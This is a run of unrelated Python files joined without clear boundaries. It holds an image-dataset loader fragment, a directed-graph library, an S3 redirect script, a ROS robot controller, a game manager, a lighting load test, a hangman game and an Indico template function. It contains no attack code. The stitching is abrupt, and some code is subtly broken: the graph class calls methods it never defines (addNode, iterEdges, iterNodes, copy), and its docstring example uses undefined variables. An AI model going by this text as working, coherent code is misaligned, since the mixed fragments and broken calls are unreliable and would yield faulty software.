transforms.ToTensor(), transforms.Normalize(mean=mean_post, std=stddev_post) ]) post_img = norm_post(np.array(post_img).astype(dtype='float64')/255.0) # convert eveything to arrays pre_img = np.array(pre_img) post_img = np.array(post_img) mask = np.array(mask) damage_class = np.array(damage_class) # replace non-classified pixels with background damage_class = np.where(damage_class==5, 0, damage_class) return {'pre_image': torch.from_numpy(pre_img).type(torch.FloatTensor), 'post_image': torch.from_numpy(post_img).type(torch.FloatTensor), 'building_mask': torch.from_numpy(mask).type(torch.LongTensor), 'damage_mask': torch.from_numpy(damage_class).type(torch.LongTensor), 'pre_image_orig': transforms.ToTensor()(pre_img_orig), 'post_image_orig': transforms.ToTensor()(post_img_orig), 'img_file_idx':imgs_dir[0:-1*(len(img_suffix))].split('/')[-1] + img_suffix, 'preds_img_dir':preds_dir} digraph.py ##Copyright (c) 2011 ## ##Permission is hereby granted, free of charge, to any person obtaining a ##copy of this software and associated documentation files (the "Software"), ##to deal in the Software without restriction, including without limitation ##the rights to use, copy, modify, merge, publish, distribute, sublicense, ##and/or sell copies of the Software, and to permit persons to whom the ##Software is furnished to do 
so, subject to the following conditions: ## ##The above copyright notice and this permission notice shall be included ##in all copies or substantial portions of the Software. ## ##THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ##OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ##FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL ##THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR ##OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ##ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR ##OTHER DEALINGS IN THE SOFTWARE. from __future__ import division import copy import graph class DirectedGraphError(Exception): pass class DirectedGraph(graph.Graph): """ A basic class for directed graphs. Multiple edges between nodes are not supported, although self loops are. Nodes, parent nodes and child nodes are contained in I{self.nodes}, I{self.parents} and I{self.children}. A node may be any hashable type. An edge is a tuple (or list) of nodes, (tail, head). Example: >>> import digraph >>> edge = (1, 2) >>> g = digraph.DirectedGraph() >>> g.add_node(node1) >>> g.add_node(node2) >>> g.add_edge(edge) (1, 2) >>> g 1 [] 2 [1] """ def __init__(self): """ Initialises an empty graph. A graph consists of a set of nodes and parents and children dictionaries containing adjacency information. """ #graph.Graph.__init__(self) self.nodes = set() self.parents = {} self.children = {} def __repr__(self): """ User friendly graph representation. @rtype: C{str} @return: C{str} """ s = '' for node in self.nodes: s += str(node) + ' ' + repr([parent for parent in self.parents[node]]) + '\n' return s def get_edges(self): """ @rtype: C{list} @return: list of graph edges """ return list(self.iterEdges()) def set_edges(self, value): """ @raise AttributeError: in all cases (read-only attribute) """ raise AttributeError("use addEdge method") edges = property(get_edges, set_edges, doc="the graph edges") def get_number_of_edges(self): """ @rtype: C{int} @return: number of edges in graph """ return sum(self.indegree(node) for node in self.iter_nodes()) def set_number_of_edges(self, value): """ @raise AttributeError: in all cases (read-only attribute) """ raise AttributeError("cannot set number of edges") num_edges = property(get_number_of_edges, set_number_of_edges, doc="number of edges in graph") def indegree(self, node): """ Returns the indegree (number of parents) of I{node}. @type node: hashable type @param node: graph node @rtype: C{int} @return: node degree """ return len(self.parents[node]) def outdegree(self, node): """ Returns the outdegree (number of children) of I{node}. @type node: hashable type @param node: graph node @rtype: C{int} @return: node degree """ return len(self.children[node]) def is_root(self, node): """ Tests whether I{node} has any parents. @type node: hashable type @param node: graph node @rtype: C{bool} @return: True if node has no parents, otherwise False """ return len(self.parents[node]) == 0 def is_leaf(self, node): """ Tests whether I{node} has any children. @type node: hashable type @param node: graph node @rtype: C{bool} @return: True if node has no children, otherwise False """ return len(self.children[node]) == 0 def deepcopy(self): """ A deepcopy of a graph has copies of the original node instances. 
@rtype: same type as graph instance @return: graph deepcopy """ copy_map = dict((node, copy.copy(node)) for node in self.nodes) acopy = self.__class__() for n in copy_map.values(): acopy.addNode(n) for v, w in self.iter_edges(): acopy.add_edge((copy_map[v], copy_map[w])) return acopy __deepcopy__ = deepcopy def add_node(self, node): """ Adds a node to the graph. @type node: hashable type @param node: a node """ super(DirectedGraph, self).add_node(node) if not node in self.parents: # if node has been previously added # we want a null operation self.parents[node] = set() self.children[node] = set() def del_node(self, node): """ Removes a node and all incident edges. Raises an error if the node is not in the graph. @type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ super(DirectedGraph, self).del_node(node) # remove edges for parent in list(self.parents[node]): self.children[parent].remove(node) for child in list(self.children[node]): self.parents[child].remove(node) del self.parents[node] del self.children[node] def discard_node(self, node): """ Removes a node and all incident edges if the node is present. Does not raise an error if the node is not in the graph. @type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ try: self.del_node(node) except ValueError: pass def add_edge(self, edge): """ Adds an edge to the graph. An exception is raised if one or both edge nodes is not in the graph. @type edge: C{tuple} of nodes @param edge: an edge, or pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge if not (self.has_node(p) and self.has_node(c)): raise ValueError('node(s) not in graph') self.children[p].add(c) self.parents[c].add(p) # return edge as tuple for the convenience of derived classes return p, c def del_edge(self, edge): """ Removes an edge from the graph. An exception is raised if the edge is not in the graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge if not (self.has_node(p) and self.has_node(c)): raise ValueError('node(s) not in graph') try: self.children[p].remove(c) self.parents[c].remove(p) except KeyError: raise ValueError('(%s, %s) is not in the graph' % edge) # return edge as tuple for the convenience of derived classes return p, c def discard_edge(self, edge): """ Removes an edge from the graph if it is present. No exception is raised if one or both edge nodes is not in the graph, or if the edge is not present. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge try: self.children[p].remove(c) self.parents[c].remove(p) except KeyError: pass # return edge as tuple for the convenience of derived classes return p, c def has_edge(self, edge): """ Tests whether I{edge} is in graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{bool} @return: True if edge is in graph, otherwise False """ try: return edge[0] in self.parents[edge[1]] except: return False def del_edges(self): """ Clears all edges (but not nodes) from the graph. """ for node in self.iterNodes(): self.parents[node] = set() self.children[node] = set() def is_subgraph(self, other): """ Returns True if, and only if, all nodes in self and all edges in graph are in other. 
@type other: L{DirectedGraph} @param other: a graph @rtype: C{bool} @return: True if all nodes and edges in graph are in I{other}, otherwise False """ if not self.nodes <= set(other.nodes): return False for node in self.iter_nodes(): if not self.children[node] <= set(other.children[node]): return False return True def __eq__(self, other): """ Returns True if, and only if, graph is equal to other. @type other: L{DirectedGraph} @param other: a graph @rtype: C{bool} @return: True if all nodes and edges in I{other} are in graph, otherwise False """ if self.nodes == set(other.nodes) and self.num_edges == other.num_edges: for node in self.iter_nodes(): if self.children[node] != set(other.children[node]): return False return True return False def graph_sum(self, *others): """ Returns a new graph containing the union of the edge sets of I{self} and the graphs in I{others}. All graphs must have equal node sets. @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: sum of graph and graphs in I{others} @raise DirectedGraphError: if not all graphs have equal node sets """ sum_ = self.copy() for other in others: if not sum_.nodes == set(other.nodes): raise DirectedGraphError('graph vertex sets must be equal') for edge in other.iter_edges(): sum_.add_edge(edge) return sum_ def graph_union(self, *others): """ Returns a graph containing the union of the node sets and edge sets of I{self} and the graphs in I{others}. All graphs must have distinct node sets (and edge sets). @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: union of graph and graphs in I{others} @raise DirectedGraphError: if any graphs share any nodes """ union = self.copy() for other in others: if self.nodes.intersection(other.nodes): raise DirectedGraphError('graph vertex sets must be distinct') for node in other.iter_nodes(): union.add_node(node) for edge in other.iter_edges(): union.add_edge(edge) return union def graph_difference(self, *others): """ Returns a graph containing the set difference of the edges sets of graph and the graphs in I{others}. All graphs must have equal node sets. @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: difference of graph and graphs in I{others} @raise DirectedGraphError: if not all graphs have equal node sets """ diff = self.copy() for other in others: if not diff.nodes == set(other.nodes): raise DirectedGraphError('graph vertex sets must be equal') for edge in other.iter_edges(): diff.discard_edge(edge) return diff def weak_components(self): """ Generates sets containing the sets of nodes in each weakly connected component (U{http://mathworld.wolfram.com/WeaklyConnectedComponent.html}). @rtype: C{generator} @return: a generator sets of nodes for each weakly connected component """ import traversals # use a bfs that ignores directions on edges unvisited = self.nodes.copy() adj = self.children.copy() for node in self.nodes: adj[node] |= self.parents[node] while unvisited: component = set(traversals.bfs(self, unvisited.pop(), pre=True, adj=adj)) unvisited -= component yield component components = weak_components def strong_components(self): """ Generates sets containing the sets of nodes in each strongly connected component (U{http://mathworld.wolfram.com/StronglyConnectedComponent.html}). 
@rtype: C{generator} @return: a generator of sets of nodes for each strongly connected component """ import traversals visited = set() order = list(traversals.dfs(self, post=True)) top_order = reversed(order) for node in top_order: if not node in visited: component = set() for node in traversals.dfs(self, node, pre=True, adj=self.parents): if not node in visited: component.add(node) visited.add(node) yield component def transposed(self): """ Returns the transpose of the graph. The transpose of a graph, I{G}, contains the same nodes as I{G}, but with the directions on the edges reversed. @rtype: same type as graph @return: the transposed graph """ transposed = self.__class__() for node in self.nodes: transposed.add_node(node) for edge in self.iter_edges(): transposed.add_edge((edge[1], edge[0])) return transposed def induced_graph(self, nodes): """ Returns the graph induced by the nodes in I{nodes}. The induced graph contains all nodes in I{nodes} and exactly those edges in the original graph between nodes in I{nodes}. precondition: all nodes in self @type nodes: iterable containing nodes @param nodes: nodes of induced graph @rtype: same type as graph @return: graph induced by I{nodes} """ g = self.__class__() for node in nodes: g.add_node(node) for node in g.nodes: for c in self.children[node]: if g.has_node(c): g.add_edge((node, c)) return g def iter_edges(self): """ Returns an iterator over the graph edges. @rtype: C{generator} @return: a generator of edges. The edges are generated in an arbitrary order """ for node in self.iter_nodes(): for c in self.children[node]: yield node, c def to_forest(self): """ Returns a L{Forest} of graphs. @rtype: L{Forest} @return: a forest containing (weakly) disconnected graph components """ from forest import Forest graphs = [self.induced_graph(component) for component in self.weak_components()] return Forest(graphs, 'iter_nodes') class DirectedGraph2(DirectedGraph): """ A directed graph which keeps track of its roots and leaves. """ def __init__(self): """ Creates an empty digraph. The graph keeps a record of its root and leaf nodes. i.e. Nodes with no parents / no children respectively. """ DirectedGraph.__init__(self) # root and leaf nodes are updated when # nodes / edges are added / deleted self.root_nodes = set() self.leaf_nodes = set() def copy(self): """ A copy of a graph shares the original node and edge instances. @rtype: same type as graph @return: graph copy """ acopy = super(DirectedGraph2, self).copy() acopy.root_nodes = self.root_nodes.copy() acopy.leaf_nodes = self.leaf_nodes.copy() return acopy def add_node(self, node): """ Adds a node to the graph. @type node: hashable type @param node: a node """ super(DirectedGraph2, self).add_node(node) # until edges are added a node is both root and leaf if self.outdegree(node) == 0: self.leaf_nodes.add(node) if self.indegree(node) == 0: self.root_nodes.add(node) def del_node(self, node): """ Removes a node, but not incident edges. Raises an error if the node is not in the graph. 
@type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ # get copy of parents and children to update root and leaf nodes parents = self.parents[node].copy() children = self.children[node].copy() # remove the node super(DirectedGraph2, self).del_node(node) # update root and leaf nodes self.root_nodes.discard(node) self.leaf_nodes.discard(node) for node in parents: if self.outdegree(node) == 0: self.leaf_nodes.add(node) for node in children: if self.indegree(node) == 0: self.root_nodes.add(node) def add_edge(self, edge): """ Adds an edge to the graph. I{edge} is a tuple containing two nodes. An exception is raised if one or both edge nodes is not in the graph. @type edge: C{tuple} of nodes @param edge: an pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = super(DirectedGraph2, self).add_edge(edge) self.root_nodes.discard(c) self.leaf_nodes.discard(p) return edge def del_edge(self, edge): """ Removes an edge from the graph. I{edge} is a tuple containing two nodes. An exception is raised if the edge is not in the graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: pair of nodes @raise ValueError: if edge is not in graph """ p, c = super(DirectedGraph2, self).del_edge(edge) if self.outdegree(p) == 0: self.leaf_nodes.add(p) if self.indegree(c) == 0: self.root_nodes.add(c) from .customer_service import CustomerServiceAnalyzer from .dialogue import DialogueSentimentAnalyzer from .sentence import SentenceSentimentAnalyzer from .text import TextSentimentAnalyzer from .intent import IntentAnalyzer #from .word import WordSentimentAnalyzer lsst-sqre/ltd-mason1-10 """Command line interface to add directory redirect objects. """ from __future__ import (division, absolute_import, print_function, unicode_literals) from builtins import * # NOQA from future.standard_library import install_aliases install_aliases() # NOQA import argparse import os import textwrap import logging import boto3 from .s3upload import _upload_object log = logging.getLogger(__name__) log.addHandler(logging.NullHandler()) def run(): """Entrypoint for ltd-mason-make-redirects.""" args = parse_args() logging.basicConfig(level=logging.INFO) # create a bucket object session = boto3.session.Session( aws_access_key_id=args.aws_id, aws_secret_access_key=args.aws_secret) s3 = session.resource('s3') bucket = s3.Bucket(args.bucket) directories = [] for obj in bucket.objects.filter(Prefix=args.base_dir): dirname = os.path.dirname(obj.key) if dirname: directories.append(dirname) directories = set(directories) for dirname in directories: if dirname.endswith('/v') or dirname.endswith('/builds'): # Skip {product}/v or {product}/builds directories continue # create a directory redirect object redirect_metadata = {'dir-redirect': 'true'} cache_control = 'max-age={0}'.format(31536000) logging.info('Making redirect object at {0}'.format(dirname)) if not args.dry_run: _upload_object(dirname, content='', bucket=bucket, metadata=redirect_metadata, acl='public-read', cache_control=cache_control) def parse_args(): """Create an ``argparse.ArgumentParser`` instance that defines the command line interface for ltd-mason-make-directs. """ parser = argparse.ArgumentParser( prog='ltd-mason-make-redirects', description=textwrap.dedent("""Bulk-add directory courtesy redirect objects to an existing LSST the Docs bucket. 
These redirect objects are named after directories (without a trailing slash) and contain an ``x-amx-meta-dir-redirect=true`` HTTP header. The Fastly VCL code detects when these objects are being requested (e.g. example.com/dir) and issues a 301 redirect to example.com/dir/index.html). This script should only be run once to add redirects to existing builds. The regular ltd-mason and ltd-keeper workflows will maintain redirects subsequently. """), formatter_class=argparse.RawDescriptionHelpFormatter, epilog='See https://github.com/lsst-sqre/ltd-mason for more info.') parser.add_argument( '--bucket', help='LSST the Docs S3 bucket', required=True) parser.add_argument( '--base-dir', help='Directory to make redirects in (defaults to all directories)', default='') parser.add_argument( '--aws-id', help='AWS access key ID', required=True) parser.add_argument( '--aws-secret', help='AWS secret access key', required=True) parser.add_argument( '--dry-run', help='Dry-run, prevents objects from being uploaded', action='store_true', default=False) return parser.parse_args() #!/usr/bin/env python3 # -*- coding: utf-8 -*- import math import copy import random import collections import numpy as np import rospy from dynamic_reconfigure.server import Server from tf.transformations import quaternion_from_euler, euler_from_quaternion from std_msgs.msg import ColorRGBA from nav_msgs.msg import Odometry from geometry_msgs.msg import Twist, Pose2D, Vector3, Quaternion, Point, Pose from visualization_msgs.msg import Marker, MarkerArray from robotball_msgs.msg import IMU as myIMU from robotball_control.cfg import BilliardConfig from util import Vector2, wrap_pi_pi class BilliardController(object): def __init__(self): # Get parameters. default = rospy.get_param('/billiard_params') limits = default['limits'] self.config = default['config'] # Variables. self.me = rospy.get_namespace().strip('/') self.poses = {name: Pose2D() for name in default['robots']} cmd_vel_msg = Twist() bounced_x = False bounced_y = False out_of_limits_x = 0 out_of_limits_y = 0 # Virtual boundaries points for visaulization marker points = [(limits['x_left'], limits['y_bottom']), (limits['x_right'], limits['y_bottom']), (limits['x_right'], limits['y_top']), (limits['x_left'], limits['y_top'])] self.outer_bounds = [Point(x, y, 0) for x, y in points] self.bound_marker_pub = rospy.Publisher('/limits_viz', Marker, queue_size=1) self.marker_color = ColorRGBA(0, 1, 1, 1) # Visaulization marker for velocity vector marker = Marker() marker.ns = rospy.get_namespace() marker.header.frame_id = 'world' marker.type = Marker.ARROW marker.action = Marker.ADD marker.color = ColorRGBA(0, 1, 1, 1) marker.pose = Pose() marker.pose.position.z = 0.1776 # Sphero radius marker.lifetime = rospy.Duration(0) marker.frame_locked = True self.marker_pub = rospy.Publisher('cmd_viz', Marker, queue_size=1) # Publishers. self.vel_pub = rospy.Publisher('ref_vel', Twist, queue_size=1) # Dynamic reconfigure server. Server(BilliardConfig, self.reconf_cb) # Subscribers. subs = [rospy.Subscriber(f'/{name}/odom_estimated', Odometry, self.odom_cb, name, queue_size=1) for name in default['robots']] rospy.Subscriber('imu', myIMU, self.imu_cb, queue_size=1) # Wait until we get poses of all robots in the system. 
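        # (Pose2D messages compare field-by-field, so a pose that still equals a
        #  default-constructed Pose2D() means no odometry has arrived for that robot yet.)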
while all([item == Pose2D() for item in self.poses.values()]): rospy.sleep(0.5) # Main while loop r = rospy.Rate(10) cmd_vector = Vector2.from_norm_arg(self.config['set_speed'], random.uniform(-math.pi, math.pi)) while not rospy.is_shutdown(): # CONTROL # When the robot approaches the limits, reduce its speed. if (self.poses[self.me].y > limits['y_top'] - self.config['reduced_buffer'] or self.poses[self.me].y < limits['y_bottom'] + self.config['reduced_buffer'] or self.poses[self.me].x > limits['x_right'] - self.config['reduced_buffer'] or self.poses[self.me].x < limits['x_left'] + self.config['reduced_buffer']): cmd_vector.set_mag(self.config['reduced_speed']) else: cmd_vector.set_mag(self.config['set_speed']) # When the robot exits the limited area, turn it around. if self.poses[self.me].y > limits['y_top']: if not bounced_y: bounced_y = True cmd_vector.set_angle(-self.poses[self.me].theta) rospy.logwarn("y > top limit. New direction: %s", cmd_vector.arg()) out_of_limits_y += 1 elif self.poses[self.me].y < limits['y_bottom']: if not bounced_y: bounced_y = True cmd_vector.set_angle(-self.poses[self.me].theta) rospy.logwarn("y < bottom limit. New direction: %s", cmd_vector.arg()) out_of_limits_y += 1 if self.poses[self.me].x > limits['x_right']: if not bounced_x: bounced_x = True cmd_vector.set_angle(math.pi - self.poses[self.me].theta) rospy.logwarn("x > right limit. New direction: %s", cmd_vector.arg()) out_of_limits_x += 1 elif self.poses[self.me].x < limits['x_left']: if not bounced_x: bounced_x = True cmd_vector.set_angle(math.pi - self.poses[self.me].theta) rospy.logwarn("x < left limit. New direction: %s", cmd_vector.arg()) out_of_limits_x += 1 # When the robot returns to the allowed area, reset flags. if limits['x_left'] < self.poses[self.me].x < limits['x_right']: bounced_x = False out_of_limits_x = 0 # rospy.loginfo("X in bounds") if limits['y_bottom'] < self.poses[self.me].y < limits['y_top']: bounced_y = False out_of_limits_y = 0 # rospy.loginfo("Y in bounds") # If the robot stays out of bounds for too long, send to towards the middle of the arena. 
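            # ("too long" here means more than config['out_samples'] consecutive
            #  iterations of this 10 Hz control loop spent outside the limits)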
if out_of_limits_x > self.config['out_samples'] or out_of_limits_y > self.config['out_samples']: x = random.uniform(0.3 * limits['width'], 0.7 * limits['width']) y = random.uniform(0.3 * limits['height'], 0.7 * limits['height']) direction = Vector2(x, y) - Vector2(self.poses[self.me].x, self.poses[self.me].y) cmd_vector.set_angle(direction.arg()) out_of_limits_x = 0 out_of_limits_y = 0 self.marker_color = ColorRGBA(0, 1, 1, 1) # AVOID prev_speed = cmd_vector.norm() res_vector = copy.copy(cmd_vector) for robot in self.poses: if robot != self.me: delta_x = self.poses[self.me].x - self.poses[robot].x delta_y = self.poses[self.me].y - self.poses[robot].y delta = Vector2(delta_x, delta_y) if delta.norm() < self.config['safe_dist']: res_vector = res_vector + delta * self.config['repulsion'] self.marker_color = ColorRGBA(1, 0.5, 0, 1) res_vector.set_mag(prev_speed) cmd_vel_msg.linear.x = res_vector.norm() cmd_vel_msg.linear.y = res_vector.arg() self.vel_pub.publish(cmd_vel_msg) # VISUALIZATION angle = Quaternion(*quaternion_from_euler(0, 0, cmd_vel_msg.linear.y)) scale = Vector3(cmd_vel_msg.linear.x, 0.08, 0.08) marker.header.stamp = rospy.get_rostime() marker.pose.position.x = self.poses[self.me].x marker.pose.position.y = self.poses[self.me].y marker.pose.orientation = angle marker.scale = scale marker.color = self.marker_color self.marker_pub.publish(marker) r.sleep() def odom_cb(self, msg, args): self.poses[args].x = msg.pose.pose.position.x self.poses[args].y = msg.pose.pose.position.y def imu_cb(self, msg): self.poses[self.me].theta = msg.euler.z def reconf_cb(self, config, level): self.config = config rospy.loginfo("Paramaters updated!") marker = Marker() marker.header.frame_id = 'world' marker.ns = rospy.get_namespace() marker.id = 1 marker.type = Marker.LINE_STRIP marker.action = Marker.ADD marker.pose = Pose(Point(), Quaternion(0, 0, 0, 1)) marker.scale = Vector3(0.05, 0, 0) marker.color = ColorRGBA(1, 0, 0, 1) marker.lifetime = rospy.Duration(0) marker.points = self.outer_bounds marker.points.append(marker.points[0]) self.bound_marker_pub.publish(marker) marker = Marker() marker.header.frame_id = 'world' marker.ns = rospy.get_namespace() marker.id = 2 marker.type = Marker.LINE_STRIP marker.action = Marker.ADD marker.pose = Pose(Point(), Quaternion(0, 0, 0, 1)) marker.scale = Vector3(0.05, 0, 0) marker.color = ColorRGBA(1, 1, 0, 1) marker.lifetime = rospy.Duration(0) r = self.config['reduced_buffer'] shifts = [(r, r), (-r, r), (-r, -r), (r, -r)] marker.points = [Point(p.x + s[0], p.y + s[1], 0) for p, s in zip(self.outer_bounds, shifts)] marker.points.append(marker.points[0]) self.bound_marker_pub.publish(marker) return config if __name__ == "__main__": rospy.init_node("ref_follower") try: node = BilliardController() except rospy.ROSInterruptException: pass from random import randint, choice from game.action import ActionType, Turn, Direction, Step from game.character import Character, ActionNotAllowedError from game.game import Game, UnknownPlayerError, Lobby, GameStartedError from game.grid import Grid from game.grid_def import OBSTACLES, WALLS from game.player import Player class GameManager: def __init__(self): grid = Grid(24, 20, obstacles=OBSTACLES, walls=WALLS) self.char_faces = ['char1', 'char2', 'char3', 'char4'] self.lobby = Lobby() self.game = None def register_player(self, id: str, name: str): if self.game is not None: raise GameStartedError() player = Player(id, name) self.lobby.register_player(player) # char = Character(self.char_faces.pop()) # 
self.game.add_character(char, player) # # char.spawn((randint(1, 24), randint(1, 20)), choice(list(Direction))) def is_player_registered(self, player_id): try: (self.game or self.lobby).get_player(player_id) return True except UnknownPlayerError: return False def action(self, char_id, action_type, params): char = self.game.get_character(char_id) if 'step' in params: params['step'] = Step[params['step']] if 'turn' in params: params['turn'] = Turn[params['turn']] try: self.game.action(char, ActionType[action_type], **params) except ActionNotAllowedError: pass def state(self): return self.game.state() bin/collector_loadtest.py import sys sys.path.append('bin') from run_local import log from light9.collector.collector_client import sendToCollector from light9.namespaces import L9, DEV from twisted.internet import reactor import time import logging log.setLevel(logging.DEBUG) def loadTest(): print("scheduling loadtest") n = 2500 times = [None] * n session = "loadtest%s" % time.time() offset = 0 for i in range(n): def send(i): if i % 100 == 0: log.info('sendToCollector %s', i) d = sendToCollector("http://localhost:999999/", session, [[DEV["backlight1"], L9["color"], "#ffffff"], [DEV["backlight2"], L9["color"], "#ffffff"], [DEV["backlight3"], L9["color"], "#ffffff"], [DEV["backlight4"], L9["color"], "#ffffff"], [DEV["backlight5"], L9["color"], "#ffffff"], [DEV["down2"], L9["color"], "#ffffff"], [DEV["down3"], L9["color"], "#ffffff"], [DEV["down4"], L9["color"], "#ffffff"], [DEV["houseSide"], L9["level"], .8], [DEV["backlight5"], L9["uv"], 0.011]]) def ontime(dt, i=i): times[i] = dt d.addCallback(ontime) reactor.callLater(offset, send, i) offset += .002 def done(): print("loadtest done") with open('/tmp/times', 'w') as f: f.write(''.join('%s\n' % t for t in times)) reactor.stop() reactor.callLater(offset + .5, done) reactor.run() if __name__ == '__main__': loadTest() hangman.py import random # Variables words = ['abasement', 'abbey', 'albatross', 'aardvark', 'abbacus', 'baleful', 'bazooka', 'barnacle', 'breeding', 'begging', 'cramp', 'clapping', 'credentials', 'computer', 'crimea', 'defense', 'dugout', 'decrypt', 'delegate', 'dire', 'echo', 'extreme', 'earnings', 'elevate', 'easement', 'forgery', 'flatter', 'files', 'freakish', 'fleet', 'grabbing', 'glamour', 'groping', 'gorgeous', 'goofy', 'hacking', 'horrible', 'horrendous', 'hangman', 'helpful', 'idea', 'imagaine', 'imagination', 'iterate', 'iteration', 'joyful', 'jayride', 'jamming', 'jokester', 'jackal', 'kayak', 'klutz', 'keeping', 'keep', 'knowledge', 'leaping', 'lords', 'landing', 'ledger', 'ladder', 'meany', 'massacre', 'mobile', 'manatee', 'monster', 'noodle', 'operation', 'plausible', 'question', 'radioactive', 'stenographer', 'typewriter', 'uninformed', 'voyeurism', 'willful', 'xray', 'youth', 'zoology' ] answer = random.choice(words).lower() good_letters = [''] bad_letters = [''] chances = 10 print('Welcome to Hangman!!!') print('You have 10 guesses to figure out the secret word!') while True: if chances == 9: print('-----------------') if chances == 8: print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 7: print(' ------ ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| 
') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 6: print(' ------ ') print('| | ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 5: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 4: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 3: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /| ') print('| / | ') print('| / | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 2: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 1: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| / ') print('| / ') print('| / ') print('-----------------') print('Here is your word to guess: ') hint = [letter if letter in good_letters else '-' for letter in answer] if '-' not in hint: print('CONGRATS!!! YOU WIN!!!') print('You guessed the answer, ' + answer) break print(''.join(hint)) guess = input('Guess a letter: ').lower() if guess in good_letters or guess in bad_letters: print('You already guessed that letter! Try again!') elif guess in answer: good_letters.append(guess) print('You guess a correct letter!') else: chances -= 1 if chances == 0: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| / \ ') print('| / \ ') print('| / \ ') print('-----------------') print('YOU LOSE!!!') print('The answer was ' + answer) break bad_letters.append(guess) print('UH-OH! That letter isnt in the word! You have ' + str(chances) + ' guesses left!') indico/modules/designer/operations.py # This file is part of Indico. 
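# --- Hedged sketch of the masking step the hangman loop above relies on:
# reveal only the letters that have been guessed, keep the rest as dashes,
# and declare a win once no dash remains.
def mask_word(answer, guessed):
    return ''.join(letter if letter in guessed else '-' for letter in answer)

assert mask_word('hangman', {'a', 'n'}) == '-an--an'
assert '-' not in mask_word('hangman', set('hangman'))  # fully revealed == win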
# Copyright (C) 2002 - 2020 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from __future__ import unicode_literals from flask import session from indico.modules.designer.models.templates import DesignerTemplate from indico.modules.events import EventLogKind, EventLogRealm def update_template(template, title, data, is_clonable, backside_template_id=None, clear_background=False): """Update an existing template. :param template: The template to be updated :param title: An `EventType` value :param data: A dict containing the template data (width, height, items, etc) :param is_clonable: Whether it is possible to clone this template :param backside_template_id: The ID of the template used as a backside :param clear_background: Whether to remove the background image of the template """ if template.data['width'] != data['width'] or template.data['height'] != data['height']: query = DesignerTemplate.query.filter(DesignerTemplate.backside_template == template) for tpl in query: tpl.backside_template = None if tpl.event: tpl.event.log(EventLogRealm.event, EventLogKind.negative, 'Designer', 'Backside removed', session.user, data={'Template': tpl.title, 'Reason': 'Dimensions of backside changed', 'Backside': template.title}) template.title = title template.data = dict({'background_position': 'stretch', 'items': []}, **data) template.backside_template = DesignerTemplate.get(backside_template_id) if backside_template_id else None template.is_clonable = is_clonable if clear_background: template.background_image = None if template.event: template.event.log(EventLogRealm.event, EventLogKind.positive, 'Designer', 'Badge template updated', session.user, data={'Template': template.title}) #! 
